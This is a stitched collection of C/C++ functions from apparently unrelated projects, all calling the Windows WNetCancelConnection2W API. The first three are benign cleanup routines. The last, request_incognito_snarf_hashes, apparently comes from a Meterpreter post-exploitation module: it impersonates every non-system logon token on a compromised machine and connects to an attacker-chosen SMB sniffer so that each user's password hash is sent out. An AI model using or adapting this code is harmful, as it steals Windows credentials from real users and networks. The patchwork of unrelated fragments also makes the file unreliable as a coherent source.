void
DriveMapping::Disconnect(wchar_t aDriveLetter)
{
wchar_t drvTemplate[] = {aDriveLetter, L':', L'\0'};
DWORD result = WNetCancelConnection2W(drvTemplate, 0, TRUE);
MOZ_ASSERT(result == NO_ERROR);
}
void MRegistryBase::ConnectLocal()
{
if (bRemote)
{
if (sRemoteResource[0])
{
WNetCancelConnection2W(sRemoteResource, 0, 0);
}
}
bRemote = false; sRemoteServer[0] = 0; sRemoteResource[0] = 0;
}
void SAL_CALL osl_freeSecurityHandle(oslSecurity Security)
{
if (Security)
{
oslSecurityImpl *pSecImpl = (oslSecurityImpl*)Security;
if (pSecImpl->m_pNetResource != NULL)
{
WNetCancelConnection2W(pSecImpl->m_pNetResource->lpRemoteName, 0, sal_True);
free(pSecImpl->m_pNetResource->lpRemoteName);
free(pSecImpl->m_pNetResource);
}
if (pSecImpl->m_hToken)
CloseHandle(pSecImpl->m_hToken);
if ( pSecImpl->m_hProfile )
CloseHandle(pSecImpl->m_hProfile);
free (pSecImpl);
}
}
// Send off hashes for all tokens to IP address with SMB sniffer running
DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
{
DWORD num_tokens = 0, i;
SavedToken *token_list = NULL;
NETRESOURCEW nr;
HANDLE saved_token;
TOKEN_PRIVS token_privs;
wchar_t conn_string[BUF_SIZE] = L"", domain_name[BUF_SIZE] = L"",
return_value[BUF_SIZE] = L"", temp[BUF_SIZE] = L"";
Packet *response = packet_create_response(packet);
char *smb_sniffer_ip = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
// Initialise net_resource structure (essentially just set ip to that of smb_sniffer)
if (_snwprintf(conn_string, BUF_SIZE, L"\\\\%s", smb_sniffer_ip) == -1)
{
conn_string[BUF_SIZE - 1] = '\0';
}
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = conn_string;
// Save current thread token if one is currently being impersonated
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
packet_transmit_response(GetLastError(), remote, response);
goto cleanup;
}
// Use every token and get hashes by connecting to SMB sniffer
for (i = 0; i < num_tokens; i++)
{
if (token_list[i].token)
{
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
// XXX This may need some expansion to support other languages
if (_wcsicmp(domain_name, L"NT AUTHORITY"))
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2W(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2W(&nr, NULL, NULL, 0))
{
// Revert to primary token
RevertToSelf();
}
}
CloseHandle(token_list[i].token);
}
}
packet_transmit_response(ERROR_SUCCESS, remote, response);
cleanup:
free(token_list);
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
{
ImpersonateLoggedOnUser(saved_token);
}
return ERROR_SUCCESS;
}
